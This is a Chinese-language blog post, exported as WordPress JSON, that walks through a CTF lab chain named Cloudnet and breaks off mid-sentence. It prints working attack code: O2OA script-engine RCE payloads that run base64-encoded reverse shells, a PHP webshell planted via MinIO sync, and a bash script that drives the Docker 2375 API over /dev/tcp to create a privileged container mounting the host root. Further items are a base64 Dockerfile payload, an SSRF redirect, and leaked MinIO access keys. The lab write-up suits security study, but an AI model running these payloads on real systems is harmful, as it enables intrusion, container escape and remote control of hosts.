{"id":1063,"date":"2025-05-31T18:11:40","date_gmt":"2025-05-31T10:11:40","guid":{"rendered":"https:\/\/www.s1mh0.cn\/blog\/?p=1063"},"modified":"2025-06-03T22:41:41","modified_gmt":"2025-06-03T14:41:41","slug":"cqyj_cloudnet","status":"publish","type":"post","link":"https:\/\/www.s1mh0.cn\/blog\/index.php\/2025\/05\/31\/cqyj_cloudnet\/","title":{"rendered":"\u6625\u79cb\u4e91\u5883-Cloudnet"},"content":{"rendered":"<h2>CloudNet<\/h2>\n<p>\u6700\u8be6\u7ec6\u7684\u4e00\u96c6\uff09<\/p>\n<p>\u6d89\u53ca\u7684\u77e5\u8bc6\u70b9<\/p>\n<pre><code class=\"language-text\">O2OA \u9ed8\u8ba4\u8d26\u5bc6+\u540e\u53f0RCE\nminio\u6570\u636e\u540c\u6b65RCE\nMinio SSRF + 2375\u7aef\u53e3docker_api\u5bb9\u5668\u6302\u8f7d\u9003\u9038\n\u6781\u81f4cms(ThinkPHP)\u591a\u8bed\u8a00\u6a21\u5757\u6587\u4ef6\u5305\u542bRCE\n\u9ed8\u8ba4\u8def\u5f84\u83b7\u53d6Kubernetes SA_token\nKubernetes\u5bb9\u5668\u6302\u8f7d\u9003\u9038\nHarbor\u955c\u50cf\u540c\u6b65\nDocker privileged\u63d0\u6743<\/code><\/pre>\n<h3>flag1<\/h3>\n<p>fscan\u626b\u5230\u4e24\u4e2aweb\u670d\u52a1\uff0c8080\u7aef\u53e3\u4e00\u8fdb\u53bb\u5c31\u662fO2oa\u7684\u540e\u53f0\u767b\u5f55\u754c\u9762<\/p>\n<pre><code class=\"language-text\">start infoscan\n39.98.124.136:22 open\n39.98.124.136:80 open\n39.98.124.136:8080 open\n[*] alive ports len is: 3\nstart vulscan\n[*] WebTitle http:\/\/39.98.124.136      code:200 len:12592  title:\u5e7f\u57ce\u5e02\u4eba\u6c11\u533b\u9662\n[*] WebTitle http:\/\/39.98.124.136:8080 code:200 len:282    title:None<\/code><\/pre>\n<h4>O2 oa\u540e\u53f0RCE<\/h4>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_1.png\" alt=\"cloudnet_1\" \/><\/p>\n<p>O2oa \u9ed8\u8ba4\u8d26\u5bc6 <code>xadmin\/o2<\/code>\u6216<code>xadmin\/o2oa@2022<\/code><\/p>\n<p>\u7528\u540e\u8005\u767b\u5f55\u8fdb\u53bb\uff0c\u5728<code>\u5e94\u7528\u2014\u2014\u670d\u52a1\u7ba1\u7406\u2014\u2014\u4ee3\u7406\u914d\u7f6e \u6216 \u63a5\u53e3\u914d\u7f6e<\/code>\u65b0\u5efa\u4e00\u4e2a\u4ee3\u7406 \u6216 \u63a5\u53e3<\/p>\n<p>\u6839\u636egithub\u4e0a\u7684<a href=\"https:\/\/github.com\/o2oa\/o2oa\/issues\/159\">issue<\/a>\uff0c\u5229\u7528\u8be5issue\u7684exp\u65e0\u6cd5\u6253\u901a\uff0c\u6309\u4f5c\u8005\u7684\u610f\u601d\u5e94\u8be5\u53ea\u662f\u8fc7\u6ee4\u4e86<code>java.lang.Class<\/code>\u7c7b\uff0c\u6362\u4e00\u4e2a\u6838\u5fc3\u7c7b\u5373\u53ef<\/p>\n<pre><code class=\"language-java\">var a = mainOutput(); \nfunction mainOutput() {\n    var classLoader = Java.type(&quot;java.lang.ClassLoader&quot;);\n    var systemClassLoader = classLoader.getSystemClassLoader();\n    var runtimeMethod = systemClassLoader.loadClass(&quot;java.lang.Runtime&quot;);\n    var getRuntime = runtimeMethod.getDeclaredMethod(&quot;getRuntime&quot;);\n    var runtime = getRuntime.invoke(null);\n    var exec = runtimeMethod.getDeclaredMethod(&quot;exec&quot;, Java.type(&quot;java.lang.String&quot;));\n    exec.invoke(runtime, &quot;bash -c {echo,YmFz...MQ==}|{base64,-d}|{bash,-i}&quot;);\n}<\/code><\/pre>\n<pre><code class=\"language-java\">var a = mainOutput();\nfunction mainOutput() {\n    var threadClazz = Java.type(&quot;java.lang.Thread&quot;);\n    var classLoader = threadClazz.currentThread().getContextClassLoader();\n    var rtClazz = classLoader.loadClass(&quot;java.lang.Runtime&quot;);\n    var stringClazz = classLoader.loadClass(&quot;java.lang.String&quot;);\n    var getRuntimeMethod = rtClazz.getMethod(&quot;getRuntime&quot;);\n    var execMethod = rtClazz.getMethod(&quot;exec&quot;, stringClazz);\n    var runtimeObj = getRuntimeMethod.invoke(rtClazz);\n    return execMethod.invoke(runtimeObj, &quot;bash -c {echo,YmFza...MQ==}|{base64,-d}|{bash,-i}&quot;);\n}<\/code><\/pre>\n<p>\u5199\u597d\u540e\u6309ctrl+s\u4fdd\u5b58\uff0c\u7528\u4ee3\u7406\u8bb0\u5f97\u586b\u5199cron\u8868\u8fbe\u5f0f\uff0c\u7528\u63a5\u53e3\u8bb0\u5f97\u53d6\u6d88\u9274\u6743<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_2.png\" alt=\"cloudnet_2\" \/><\/p>\n<p>vps\u76d1\u542c\u4e0a\u7ebf\u62ff\u7b2c\u4e00\u4e2aflag\uff0c\u8fd9\u91cc\u56e0\u4e3a\u6ca1\u6709curl\u547d\u4ee4\u3001wget\u4e00\u952e\u4e0a\u7ebf\u4e5f\u5931\u8d25\u4e86\uff0c\u6240\u4ee5\u7528pwncat\u76d1\u542c\u5e76\u4e0a\u4f20\u53cd\u5411\u9a6c\u4e0a\u7ebf<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_3.png\" alt=\"cloudnet_3\" \/><\/p>\n<h3>flag2<\/h3>\n<p>\u9776\u673a\u6d4b\u4e86\u4e0b\u53d1\u73b0\u662f\u53f0docker\u5bb9\u5668<\/p>\n<pre><code class=\"language-text\">cat \/proc\/1\/cgroup | grep -i docker<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_4.png\" alt=\"cloudnet_4\" \/><\/p>\n<h4>minio\u6570\u636e\u540c\u6b65RCE<\/h4>\n<p>\u63a5\u7740\u56de\u5e73\u53f0\uff0c\u5728<code>\u7cfb\u7edf\u914d\u7f6e-json\u914d\u7f6e-externalStorageSources (\u6587\u4ef6\u5b58\u50a8\u914d\u7f6e)<\/code>\u770b\u5230minio\u7684ak-sk\u4ee5\u53caip\u7aef\u53e3<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_5.png\" alt=\"cloudnet_5\" \/><\/p>\n<pre><code class=\"language-json\">&quot;store&quot;: {\n    &quot;minio&quot;: {\n        &quot;protocol&quot;: &quot;min&quot;,\n        &quot;username&quot;: &quot;bxBZOXDlizzuujdR&quot;,\n        &quot;password&quot;: &quot;TGdtqwJbBrEMhCCMDVtlHKU=&quot;,\n        &quot;host&quot;: &quot;172.22.18.29&quot;,\n        &quot;port&quot;: 9000,\n        &quot;name&quot;: &quot;o2oa&quot;\n    }\n},<\/code><\/pre>\n<p>\u642d\u597d\u4ee3\u7406\u8bbf\u95eeminio\uff0c\u767b\u5f55\u540e\u53d1\u73b0\u9664\u4e86o2oa\uff0c\u8fd8\u6709\u4e2aportal\u7ad9\uff0c\u6d4b\u8bd5\u53d1\u73b0\u91cc\u9762\u7684\u7f51\u7ad9\u7ed3\u6784\u8ddf\u5165\u53e3\u673a80\u7aef\u53e3\u7684web\u670d\u52a1\u662f\u4e00\u6837\u7684\uff0c\u4e0a\u4f20php\u4e00\u53e5\u8bdd\u6728\u9a6c\uff0c\u7b49\u5f85minio\u8ddf\u5165\u53e3\u673a\u8fdb\u884c\u6570\u636e\u540c\u6b65\uff08\u6bcf\u5341\u5206\u949f\uff09<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_6.png\" alt=\"cloudnet_6\" \/><\/p>\n<p>\u5165\u53e3\u673a\u62ff\u5230\u7b2c\u4e8c\u4e2aflag<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_7.png\" alt=\"cloudnet_7\" \/><\/p>\n<h3>flag3<\/h3>\n<p>\u4e00\u53e5\u8bdd\u4e0a\u7ebf\uff0c\u626b\u5185\u7f51<\/p>\n<pre><code class=\"language-text\">start infoscan\ntrying RunIcmp2\nThe current user permissions unable to send icmp packets\nstart ping\n(icmp) Target 172.22.18.23    is alive\n(icmp) Target 172.22.18.29    is alive\n(icmp) Target 172.22.18.64    is alive\n(icmp) Target 172.22.18.61    is alive\n[*] Icmp alive hosts len is: 4\n172.22.18.29:9000 open\n172.22.18.23:8080 open\n172.22.18.61:80 open\n172.22.18.64:80 open\n172.22.18.61:22 open\n172.22.18.64:22 open\n172.22.18.29:22 open\n172.22.18.23:80 open\n172.22.18.23:22 open\n172.22.18.61:10250 open\n[*] alive ports len is: 10\nstart vulscan\n[*] WebTitle http:\/\/172.22.18.23       code:200 len:12592  title:\u5e7f\u57ce\u5e02\u4eba\u6c11\u533b\u9662\n[*] WebTitle http:\/\/172.22.18.64       code:200 len:785    title:Harbor\n[+] InfoScan http:\/\/172.22.18.64       [Harbor] \n[*] WebTitle http:\/\/172.22.18.23:8080  code:200 len:282    title:None\n[*] WebTitle http:\/\/172.22.18.29:9000  code:307 len:43     title:None \u8df3\u8f6curl: http:\/\/172.22.18.29:9000\/minio\/\n[*] WebTitle http:\/\/172.22.18.61       code:200 len:8710   title:\u533b\u9662\u5185\u90e8\u5e73\u53f0\n[*] WebTitle https:\/\/172.22.18.61:10250 code:404 len:19     title:None\n[*] WebTitle http:\/\/172.22.18.29:9000\/minio\/ code:200 len:2281   title:MinIO Browser\n[+] PocScan http:\/\/172.22.18.64\/swagger.json poc-yaml-swagger-ui-unauth [{path swagger.json}]<\/code><\/pre>\n<p>\u626b\u5230Harbor\uff0c\u53ef\u4ee5\u76f4\u63a5\u4e0a<a href=\"https:\/\/github.com\/404tk\/CVE-2022-46463\">\u5de5\u5177<\/a>\u4e0b\u8f7ddocker\u5bb9\u5668\u6587\u4ef6<\/p>\n<pre><code class=\"language-text\">python3 harbor.py http:\/\/172.22.18.64\npython3 harbor.py http:\/\/172.22.18.64\/  --dump public\/mysql --v2<\/code><\/pre>\n<p>\u4e5f\u53ef\u4ee5\u76f4\u63a5docker pull\u62c9\u955c\u50cf\uff0c\u8fd9\u91cc\u9664\u4e86\u7ed9<code>dockerd<\/code>\u8bbe\u7f6e HTTP\/HTTPS \u4ee3\u7406\uff0c\u4e5f\u53ef\u4ee5\u7528\u72d7\u54e5\u535a\u5ba2\u90a3\u7bc7\u65b9\u6cd5\u76f4\u63a5\u5728linux\u7528clash\u505a\u5168\u5c40\u4ee3\u7406\uff0c\u6211\u8bd5\u4e86\u8fd9\u4e24\u79cd\u65b9\u6cd5\u90fd\u53ef\u4ee5<\/p>\n<p><strong>dockerd \u8bbe\u7f6e HTTP\/HTTPS \u4ee3\u7406<\/strong><\/p>\n<p>\u5728<code>\/etc\/systemd\/system\/docker.service.d\/http-proxy.conf<\/code>\u6dfb\u52a0<\/p>\n<pre><code class=\"language-text\">[Service]\nEnvironment=&quot;HTTP_PROXY=socks5:\/\/8.138.89.236:10086\/&quot;<\/code><\/pre>\n<p><strong>Clash \u8bbe\u7f6e\u4ee3\u7406<\/strong><\/p>\n<p>config.yaml<\/p>\n<pre><code class=\"language-yaml\">mixed-port: 7890\nallow-lan: false\nexternal-controller: 127.0.0.1:42449\nsecret: xxx\nproxies:\n    - {name: &#039;SocksTest&#039;, type: socks5, server: socksip, port: socksport}<\/code><\/pre>\n<p>\u5982\u679c\u62c9\u53d6\u5931\u8d25\uff0c\u9700\u8981\u5728<code>\/etc\/docker\/daemon.json<\/code>\u6dfb\u52a0<code>insecure-registries<\/code>\u5b57\u6bb5\uff0c\u5141\u8bb8 Docker \u4e0e\u6307\u5b9a\u7684\u975e HTTPS \u79c1\u6709\u955c\u50cf\u4ed3\u5e93\uff08IP \u4e3a 172.22.18.64\uff09\u8fdb\u884c\u901a\u4fe1<\/p>\n<pre><code class=\"language-json\">{\n  &quot;insecure-registries&quot;: [&quot;172.22.18.64&quot;]\n}<\/code><\/pre>\n<p>\u914d\u7f6e\u540e\u91cd\u542f\u670d\u52a1<\/p>\n<pre><code class=\"language-text\">systemctl daemon-reload\nsystemctl restart docker<\/code><\/pre>\n<p>\u62c9\u53d6\u955c\u50cf\u4e4b\u540e\u521b\u5efa\u5bb9\u5668\uff0c\u4f46\u662f\u91cc\u9762\u6ca1\u4ec0\u4e48\u4e1c\u897f<\/p>\n<pre><code class=\"language-text\">docker pull 172.22.18.64\/public\/mysql:5.6\ndocker run -itd --name cloud 172.22.18.64\/public\/mysql:5.6<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/05\/cloudnet_8.png\" alt=\"cloudnet_8\" \/><\/p>\n<h4>minio SSRF + 2375\u7aef\u53e3docker api\u5bb9\u5668\u6302\u8f7d\u9003\u9038<\/h4>\n<p>\u90a3\u5c31\u5b66\u5927\u5934\u5e08\u5085\u8ddf<a href=\"https:\/\/zone.huoxian.cn\/d\/2801-minio-ssrf-docker-api\">\u6587\u7ae0<\/a>\u6253minio SSRF + 2375\u7aef\u53e3docker api\uff0c\u521b\u5efa\u6076\u610f\u5bb9\u5668\u6302\u8f7d\u9003\u9038<\/p>\n<p>\u56e0\u4e3a\u524d\u9762\u8fdb\u53bbmysql\u5bb9\u5668\u53d1\u73b0\u6ca1\u6709curl\u548cwget\u547d\u4ee4\uff0c\u56e0\u6b64\u7528exec\u6765\u53d1\u9001\u8bf7\u6c42\u5305\uff0c\u901a\u8fc7\u4e0e 2375\u7aef\u53e3\u7684 Docker Daemon API \u4ea4\u4e92\uff0c\u5728\u76ee\u6807\u4e3b\u673a\u4e0a\u521b\u5efa\u5e76\u542f\u52a8\u4e00\u4e2a\u5bb9\u5668\uff0c\u5e76\u5728\u5176\u4e2d\u6267\u884c\u4e00\u4e2a\u53cd\u5411 shell \u547d\u4ee4\uff0c\u4e00\u5171\u56db\u4e2a\u5305\uff1a<\/p>\n<ul>\n<li>\u7b2c\u4e00\u4e2a\u5305\uff1a\u521b\u5efa\u4e00\u4e2a172.22.18.64\/public\/mysql:5.6\u955c\u50cf\u7684\u5bb9\u5668\uff0c\u5c06\u5bbf\u4e3b\u673a\u7684\u6839\u76ee\u5f55\u6302\u8f7d\u5230\u5bb9\u5668\u7684 <code>\/mnt<\/code>\uff0c\u4ee5\u7279\u6743\u6a21\u5f0f\u8fd0\u884c\uff1b\u5e76\u4ece Docker daemon \u7684\u54cd\u5e94\u4e2d\u89e3\u6790\u51fa\u65b0\u521b\u5efa\u7684\u5bb9\u5668\u7684 ID\uff0c\u5e76\u5c06\u5176\u4fdd\u5b58\u5230 <code>\/tmp\/id<\/code> \u6587\u4ef6\u4e2d\uff0c\u4f9b\u540e\u7eed\u542f\u52a8\u4f7f\u7528<\/li>\n<li>\u7b2c\u4e8c\u4e2a\u5305\uff1a\u542f\u52a8\u6307\u5b9a ID \u7684\u5bb9\u5668\uff0c\u5373\u7b2c\u4e00\u4e2a\u5305\u521b\u5efa\u7684\u5bb9\u5668<\/li>\n<li>\u7b2c\u4e09\u4e2a\u5305\uff1a\u5728\u8be5\u5bb9\u5668\u5185\u90e8\u521b\u5efa\u4e00\u4e2a\u65b0\u7684\u6267\u884c\u5b9e\u4f8b (\u5373\u53cd\u5f39shell\u547d\u4ee4)\uff0c\u4ece Docker daemon \u7684\u54cd\u5e94\u4e2d\u89e3\u6790\u51fa\u65b0\u521b\u5efa\u7684 exec \u5b9e\u4f8b\u7684 ID\uff0c\u5e76\u5c06\u5176\u4fdd\u5b58\u5230 <code>\/tmp\/id2<\/code> \u6587\u4ef6\u4e2d\uff0c\u8fd9\u4e2a ID \u548c\u5bb9\u5668 ID \u662f\u4e0d\u540c\u7684\uff0c\u5b83\u662f\u7528\u4e8e\u7ba1\u7406\u8fd9\u4e2a\u7279\u5b9a <code>exec<\/code> \u4f1a\u8bdd\u7684 ID<\/li>\n<li>\u7b2c\u56db\u4e2a\u5305\uff1a\u89e6\u53d1\u5e76\u6267\u884c\u8fd9\u4e2a <code>exec<\/code> \u5b9e\u4f8b\uff0c\u53cd\u5f39shell\uff08\u8bb0\u5f97\u5148\u5728\u5165\u53e3\u673a\u8d77\u4e00\u4e2anc\u76d1\u542c\uff09<\/li>\n<\/ul>\n<p>\u8fd9\u91cc\u770b\u5230\u5927\u5934\u5e08\u5085\u8bbf\u95ee\u7684 ip \u662f<code>172.17.0.1<\/code>\uff0c\u8fd9\u4e2aip\u4e00\u822c\u662f docker0 \u7f51\u5361\u7684ip\uff0c\u5373docker\u5bb9\u5668\u8bbf\u95ee\u5bbf\u4e3b\u673a\u7684ip\uff0c\u4e5f\u5c31\u662f\u8bf4minio\u670d\u52a1\u8ddfdocker api\u670d\u52a1\u662f\u5728\u540c\u4e00\u53f0\u4e3b\u673a\uff0c\u8fd9\u6837\u7684\u8bdd\u5c31\u4e0d\u9700\u8981\u8003\u8651\u76f2\u6253\u7684\u95ee\u9898\uff08\u5f53\u7136\u6b63\u5e38\u6e17\u900f\u601d\u8def\u4e5f\u53ef\u4ee5\u731c\u6d4b\u8fd9\u4fe9\u670d\u52a1\u662f\u5728\u540c\u4e00\u53f0\u4e3b\u673a\uff09<\/p>\n<p>\u4e3a\u4e86\u65b9\u4fbf\u6d4b\u8bd5\uff0c\u53ef\u4ee5\u5728\u6700\u540e\u76f4\u63a5\u52a0\u4e00\u4e2a\u53cd\u5f39shell\u7684\u64cd\u4f5c\uff0c\u4e5f\u5c31\u662f\u5165\u53e3\u673a\u5f00\u542f\u4e24\u4e2a\u76d1\u542c\uff0c\u4e00\u4e2a\u76d1\u542c\u901a\u8fc7docker api\u63a5\u53e3\u521b\u5efa\u7684\u7528\u6765\u9003\u9038\u7684docker\u5bb9\u5668\u7684shell\uff0c\u4e00\u4e2a\u662f\u76d1\u542c\u6267\u884c\u8be5Dockerfile\u7684\u5bb9\u5668\u7684shell\uff08\u901a\u8fc7\u67e5\u770b\/tmp\/sim.sh\u3001\/tmp\/id\u7b49\u6587\u4ef6\u5206\u6790\u547d\u4ee4\u6267\u884c\u60c5\u51b5\uff09<\/p>\n<p>\u83b7\u53d6 ID \u7684\u65b9\u5f0f\u4e5f\u7531\u786c\u7f16\u7801\u6539\u6210\u7528sed\u547d\u4ee4\u914d\u5408\u6b63\u5219\u83b7\u53d6<\/p>\n<pre><code class=\"language-bash\">#!\/usr\/bin\/env bash\n\n# 1\nexec 3&lt;&gt;\/dev\/tcp\/172.17.0.1\/2375\nlines=(\n    &#039;POST \/containers\/create HTTP\/1.1&#039;\n    &#039;Host: 172.17.0.1:2375&#039;\n    &#039;Connection: close&#039;\n    &#039;Content-Type: application\/json&#039;\n    &#039;Content-Length: 133&#039;\n    &#039;&#039;\n    &#039;{&quot;HostName&quot;:&quot;remoteCreate&quot;,&quot;User&quot;:&quot;root&quot;,&quot;Image&quot;:&quot;172.22.18.64\/public\/mysql:5.6&quot;,&quot;HostConfig&quot;:{&quot;Binds&quot;:[&quot;\/:\/mnt&quot;],&quot;Privileged&quot;:true}}&#039;\n)\nprintf &#039;%s\\r\\n&#039; &quot;${lines[@]}&quot; &gt;&amp;3\nwhile read -r data &lt;&amp;3; do\n    echo $data\n    if [[ $data == &#039;{&quot;Id&quot;:&quot;&#039;* ]]; then\n        echo $data | sed -n &#039;s\/.*&quot;Id&quot;:&quot;\\([^&quot;]*\\)&quot;.*\/\\1\/p&#039; &gt; \/tmp\/id\n    fi\ndone\nexec 3&gt;&amp;-\n\n# 2\nexec 3&lt;&gt;\/dev\/tcp\/172.17.0.1\/2375\nlines=(\n    &quot;POST \/containers\/`cat \/tmp\/id`\/start HTTP\/1.1&quot;\n    &#039;Host: 172.17.0.1:2375&#039;\n    &#039;Connection: close&#039;\n    &#039;Content-Type: application\/x-www-form-urlencoded&#039;\n    &#039;Content-Length: 0&#039;\n    &#039;&#039;\n)\nprintf &#039;%s\\r\\n&#039; &quot;${lines[@]}&quot; &gt;&amp;3\nwhile read -r data &lt;&amp;3; do\n    echo $data\ndone\nexec 3&gt;&amp;-\n\n# 3\nexec 3&lt;&gt;\/dev\/tcp\/172.17.0.1\/2375\nlines=(\n    &quot;POST \/containers\/`cat \/tmp\/id`\/exec HTTP\/1.1&quot;\n    &#039;Host: 172.17.0.1:2375&#039;\n    &#039;Connection: close&#039;\n    &#039;Content-Type: application\/json&#039;\n    &#039;Content-Length: 75&#039;\n    &#039;&#039;\n    &#039;{&quot;Cmd&quot;: [&quot;\/bin\/bash&quot;, &quot;-c&quot;, &quot;bash -i &gt;&amp; \/dev\/tcp\/172.22.18.23\/10087 0&gt;&amp;1&quot;]}&#039;\n)\nprintf &#039;%s\\r\\n&#039; &quot;${lines[@]}&quot; &gt;&amp;3\nwhile read -r data &lt;&amp;3; do\n    echo $data\n    if [[ $data == &#039;{&quot;Id&quot;:&quot;&#039;* ]]; then\n        echo $data | sed -n &#039;s\/.*&quot;Id&quot;:&quot;\\([^&quot;]*\\)&quot;.*\/\\1\/p&#039; &gt; \/tmp\/id2\n    fi\ndone\nexec 3&gt;&amp;-\n\n# 4\nexec 3&lt;&gt;\/dev\/tcp\/172.17.0.1\/2375\nlines=(\n    &quot;POST \/exec\/`cat \/tmp\/id2`\/start HTTP\/1.1&quot;\n    &#039;Host: 172.17.0.1:2375&#039;\n    &#039;Connection: close&#039;\n    &#039;Content-Type: application\/json&#039;\n    &#039;Content-Length: 27&#039;\n    &#039;&#039;\n    &#039;{&quot;Detach&quot;:true,&quot;Tty&quot;:false}&#039;\n)\nprintf &#039;%s\\r\\n&#039; &quot;${lines[@]}&quot; &gt;&amp;3\nwhile read -r data &lt;&amp;3; do\n    echo $data\ndone\nexec 3&gt;&amp;-\n\n# 5\nbash -i &gt;&amp; \/dev\/tcp\/172.22.18.23\/8899 0&gt;&amp;1<\/code><\/pre>\n<p>\u8fd9\u91ccDockerfile\u7684<code>172.17.0.1<\/code>\u4e5f\u53ef\u4ee5\u76f4\u63a5\u66ff\u6362\u4e3aminio\u90a3\u53f0\u4e3b\u673a\u7684ip\uff0c\u5373<code>172.22.18.29<\/code>\uff0c\u6d4b\u8bd5\u540c\u6837\u80fd\u591f\u63a5\u6536\u5230shell\uff0c\u8bf4\u660edocker\u5bb9\u5668\u4e5f\u53ef\u4ee5\u901a\u8fc7\u8be5ip\u8bbf\u95ee\u5bbf\u4e3b\u673a<\/p>\n<p>\u6b64\u65f6\u5165\u53e3\u673a\u5145\u5f53\u6076\u610f\u670d\u52a1\u5668\uff0c\u540e\u7eed\u5c06minio\u8bf7\u6c42\u91cd\u5b9a\u5411\u5230<code>docker api<\/code>\uff0c\u9996\u5148\u5c06\u4e0a\u9762exp\u8f6cbase64\u5199\u5165\u5230\u5165\u53e3\u673a<code>\/var\/www\/html\/Dockerfile<\/code><\/p>\n<pre><code class=\"language-text\">FROM 172.22.18.64\/public\/mysql:5.6\n\nRUN echo IyEvdXNyL2Jpbi9lbnYgYmFzaAoKIyAxCmV4ZWMgMzw+L2Rldi90Y3AvMTcyLjIyLjE4LjI5LzIzNzUKbGluZXM9KAogICAgJ1BPU1QgL2NvbnRhaW5lcnMvY3JlYXRlIEhUVFAvMS4xJwogICAgJ0hvc3Q6IDE3Mi4yMi4xOC4yOToyMzc1JwogICAgJ0Nvbm5lY3Rpb246IGNsb3NlJwogICAgJ0NvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vanNvbicKICAgICdDb250ZW50LUxlbmd0aDogMTMzJwogICAgJycKICAgICd7Ikhvc3ROYW1lIjoicmVtb3RlQ3JlYXRlIiwiVXNlciI6InJvb3QiLCJJbWFnZSI6IjE3Mi4yMi4xOC42NC9wdWJsaWMvbXlzcWw6NS42IiwiSG9zdENvbmZpZyI6eyJCaW5kcyI6WyIvOi9tbnQiXSwiUHJpdmlsZWdlZCI6dHJ1ZX19JwopCnByaW50ZiAnJXNcclxuJyAiJHtsaW5lc1tAXX0iID4mMwp3aGlsZSByZWFkIC1yIGRhdGEgPCYzOyBkbwogICAgZWNobyAkZGF0YQogICAgaWYgW1sgJGRhdGEgPT0gJ3siSWQiOiInKiBdXTsgdGhlbgogICAgICAgIGVjaG8gJGRhdGEgfCBzZWQgLW4gJ3MvLioiSWQiOiJcKFteIl0qXCkiLiovXDEvcCcgPiAvdG1wL2lkCiAgICBmaQpkb25lCmV4ZWMgMz4mLQoKIyAyCmV4ZWMgMzw+L2Rldi90Y3AvMTcyLjIyLjE4LjI5LzIzNzUKbGluZXM9KAogICAgIlBPU1QgL2NvbnRhaW5lcnMvYGNhdCAvdG1wL2lkYC9zdGFydCBIVFRQLzEuMSIKICAgICdIb3N0OiAxNzIuMjIuMTguMjk6MjM3NScKICAgICdDb25uZWN0aW9uOiBjbG9zZScKICAgICdDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCcKICAgICdDb250ZW50LUxlbmd0aDogMCcKICAgICcnCikKcHJpbnRmICclc1xyXG4nICIke2xpbmVzW0BdfSIgPiYzCndoaWxlIHJlYWQgLXIgZGF0YSA8JjM7IGRvCiAgICBlY2hvICRkYXRhCmRvbmUKZXhlYyAzPiYtCgojIDMKZXhlYyAzPD4vZGV2L3RjcC8xNzIuMjIuMTguMjkvMjM3NQpsaW5lcz0oCiAgICAiUE9TVCAvY29udGFpbmVycy9gY2F0IC90bXAvaWRgL2V4ZWMgSFRUUC8xLjEiCiAgICAnSG9zdDogMTcyLjIyLjE4LjI5OjIzNzUnCiAgICAnQ29ubmVjdGlvbjogY2xvc2UnCiAgICAnQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9qc29uJwogICAgJ0NvbnRlbnQtTGVuZ3RoOiA3NScKICAgICcnCiAgICAneyJDbWQiOiBbIi9iaW4vYmFzaCIsICItYyIsICJiYXNoIC1pID4mIC9kZXYvdGNwLzE3Mi4yMi4xOC4yMy8xMDMyMSAwPiYxIl19JwopCnByaW50ZiAnJXNcclxuJyAiJHtsaW5lc1tAXX0iID4mMwp3aGlsZSByZWFkIC1yIGRhdGEgPCYzOyBkbwogICAgZWNobyAkZGF0YQogICAgaWYgW1sgJGRhdGEgPT0gJ3siSWQiOiInKiBdXTsgdGhlbgogICAgICAgIGVjaG8gJGRhdGEgfCBzZWQgLW4gJ3MvLioiSWQiOiJcKFteIl0qXCkiLiovXDEvcCcgPiAvdG1wL2lkMgogICAgZmkKZG9uZQpleGVjIDM+Ji0KCiMgNApleGVjIDM8Pi9kZXYvdGNwLzE3Mi4yMi4xOC4yOS8yMzc1CmxpbmVzPSgKICAgICJQT1NUIC9leGVjL2BjYXQgL3RtcC9pZDJgL3N0YXJ0IEhUVFAvMS4xIgogICAgJ0hvc3Q6IDE3Mi4yMi4xOC4yOToyMzc1JwogICAgJ0Nvbm5lY3Rpb246IGNsb3NlJwogICAgJ0NvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vanNvbicKICAgICdDb250ZW50LUxlbmd0aDogMjcnCiAgICAnJwogICAgJ3siRGV0YWNoIjp0cnVlLCJUdHkiOmZhbHNlfScKKQpwcmludGYgJyVzXHJcbicgIiR7bGluZXNbQF19IiA+JjMKd2hpbGUgcmVhZCAtciBkYXRhIDwmMzsgZG8KICAgIGVjaG8gJGRhdGEKZG9uZQpleGVjIDM+Ji0KCmJhc2ggLWkgPiYgL2Rldi90Y3AvMTcyLjIyLjE4LjIzLzg4OTkgMD4mMQ== | base64 -d &gt; \/tmp\/sim.sh\nRUN chmod +x \/tmp\/sim.sh &amp;&amp; \/tmp\/sim.sh<\/code><\/pre>\n<p>\u63a5\u7740\u5728\u5165\u53e3\u673a\u521b\u5efa<code>\/var\/www\/html\/index.php<\/code>\uff0c\u5e76\u5199\u5165<\/p>\n<pre><code class=\"language-PHP\">&lt;?php\nheader(&#039;Location: http:\/\/127.0.0.1:2375\/build?remote=http:\/\/172.22.18.23\/Dockerfile&amp;nocache=true&amp;t=evil:114514&#039;, false, 307);<\/code><\/pre>\n<p>\u8fd9\u91cc\u901a\u8fc7307\u8df3\u8f6c\u6765\u5b9e\u73b0post\u8bf7\u6c42\uff0c\u5e76\u914d\u5408remote\u53c2\u6570\u901a\u8fc7\u6307\u5b9a\u8fdc\u7a0bURL\u7684\u65b9\u5f0f\u6765\u6784\u5efa\u955c\u50cf<\/p>\n<p>\u63a5\u7740\u5220\u9664\u5165\u53e3\u673a\u7684<code>\/var\/www\/html\/index.html<\/code>\uff0c\u4e0d\u7136minio\u4f1a\u4f18\u5148\u8bbf\u95eeindex.html\u800c\u4e0d\u662findex.php\uff0c\u6700\u597d\u5728minio\u4e0a\u628aportal\u7ad9\u7684index.html\u4e5f\u5220\u6389\uff0c\u5426\u5219\u6570\u636e\u540c\u6b65\u4e4b\u540eindex.html\u53c8\u4f1a\u5728\u5165\u53e3\u673a\u751f\u6210<\/p>\n<p>\u7136\u540e\u5c31\u53ef\u4ee5\u6253Minio\u7684SSRF\u6f0f\u6d1e\uff0c\u5165\u53e3\u673a\u5f00\u542f\u76d1\u542c\uff0c\u8bf7\u6c42\u5305Host\u4fee\u6539\u4e3a\u5165\u53e3\u673a\u5185\u7f51ip\uff0c\u5b9e\u9645\u53d1\u5305\u5730\u5740\u4e3a<code>172.22.18.29:9000<